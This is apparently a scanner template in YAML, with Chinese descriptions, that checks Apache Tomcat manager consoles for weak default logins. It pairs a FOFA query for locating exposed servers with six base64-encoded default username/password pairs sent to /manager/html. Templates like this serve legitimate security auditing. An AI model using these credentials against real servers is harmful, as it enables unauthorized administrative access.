product: Apache-Tomcat
vName: Apache-Tomcat 弱口令
type: 默认口令/弱口令
vID: [ ]
level: 3
vDesc: 弱口令(weak password) 没有严格和准确的定义，通常认为容易被别人（他们有可能对你很了解）猜测到或被破解工具破解的口令均为弱口令。弱口令指的是仅包含简单数字和字母的口令，例如“123”、“abc”等，因为这样的口令很容易被别人破解，从而使用户的计算机面临风险，因此不推荐用户使用。
version: ''
note: ''
search:
  FOFA: app="APACHE-Tomcat"
protocol: http
link: https://blog.csdn.net/weixin_53696027/article/details/129016727
fix:
  - 修改为强口令
model: ''
logic: or
exploit:
  - exp:
      method: get
      follow: false
      path: /manager/html
      header:
        Authorization: Basic YWRtaW46MTIzNDU2
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - Tomcat Web
              - Application Manager
            logic: and
  - exp:
      method: get
      follow: false
      path: /manager/html
      header:
        Authorization: Basic dG9tY2F0OnRvbWNhdA==
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - Tomcat Web
              - Application Manager
            logic: and
  - exp:
      method: get
      follow: false
      path: /manager/html
      header:
        Authorization: Basic dG9tY2F0OjEyMzQ1Ng==
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - Tomcat Web
              - Application Manager
            logic: and
  - exp:
      method: get
      follow: false
      path: /manager/html
      header:
        Authorization: Basic bWFuYWdlcjoxMjM0NTY=
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - Tomcat Web
              - Application Manager
            logic: and
  - exp:
      method: get
      follow: false
      path: /manager/html
      header:
        Authorization: Basic bWFuYWdlcjphZG1pbjEyMzQ1Ng==
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - Tomcat Web
              - Application Manager
            logic: and
  - exp:
      method: get
      follow: false
      path: /manager/html
      header:
        Authorization: Basic bWFuYWdlcjptYW5hZ2Vy
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - Tomcat Web
              - Application Manager
            logic: and